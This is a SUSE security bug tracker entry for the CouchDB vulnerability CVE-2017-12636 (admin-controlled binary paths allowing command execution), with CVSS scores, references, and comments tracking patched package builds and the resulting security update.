Bug 1068386 (CVE-2017-12636)

Summary: VUL-0: CVE-2017-12636: couchdb: CouchDB administrative users can configure the database server via HTTP(S). Someof the configuration options include paths for operating system-level binariesthat are subsequently launched by CouchDB. This
Product: [Novell Products] SUSE Security Incidents Reporter: Marcus Meissner <meissner>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: jsuchome, smash_bz, wolfgang.frisch
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/194964/
Whiteboard: CVSSv3:SUSE:CVE-2017-12635:8.1:(AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) CVSSv3:SUSE:CVE-2017-12636:9.9:(AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) CVSSv2:SUSE:CVE-2017-12635:6.8:(AV:N/AC:L/Au:S/C:N/I:C/A:N) CVSSv2:SUSE:CVE-2017-12636:6.5:(AV:N/AC:L/Au:S/C:P/I:P/A:P) CVSSv3:RedHat:CVE-2017-12635:6.5:(AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N) CVSSv3:RedHat:CVE-2017-12636:4.7:(AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L) CVSSv2:NVD:CVE-2017-12636:9.0:(AV:N/AC:L/Au:S/C:C/I:C/A:C) CVSSv2:NVD:CVE-2017-12635:10.0:(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Marcus Meissner 2017-11-16 07:21:22 UTC
CVE-2017-12636

CouchDB administrative users can configure the database server via HTTP(S). Some
of the configuration options include paths for operating system-level binaries
that are subsequently launched by CouchDB. This allows an admin user in Apache
CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as
the CouchDB user, including downloading and executing scripts from the public
internet.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12636
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635
http://seclists.org/oss-sec/2017/q4/279
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635
https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
Comment 2 Keith Berger 2018-03-23 14:16:55 UTC
https://trello.com/c/I1KCfwb2
Comment 3 Jiří Suchomel 2018-03-26 11:02:59 UTC
So, building 1.7.1 version is not difficult:

https://build.suse.de/package/show/home:jsuchome:branches:Devel:Cloud:8/couchdb
Comment 4 Jiří Suchomel 2018-03-27 12:39:08 UTC
SR for Cloud8: https://build.suse.de/request/show/160311
Comment 6 Jiří Suchomel 2018-03-28 07:52:10 UTC
SR for SOC7: https://build.suse.de/request/show/160449
Comment 7 Jiří Suchomel 2018-04-04 09:24:55 UTC
Cloud packages updated
Comment 9 Jiří Suchomel 2018-07-24 15:21:33 UTC
Created maintenance request, I hope it's correct this way:

https://build.suse.de/request/show/168824
Comment 13 Swamp Workflow Management 2018-08-31 16:13:29 UTC
SUSE-SU-2018:2578-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1068386,1100973
CVE References: CVE-2017-12636,CVE-2018-8007
Sources used:
SUSE OpenStack Cloud 7 (src):    couchdb-1.7.2-2.8.2
SUSE Enterprise Storage 4 (src):    couchdb-1.7.2-2.8.2
Comment 14 Wolfgang Frisch 2020-09-24 13:31:40 UTC
Released.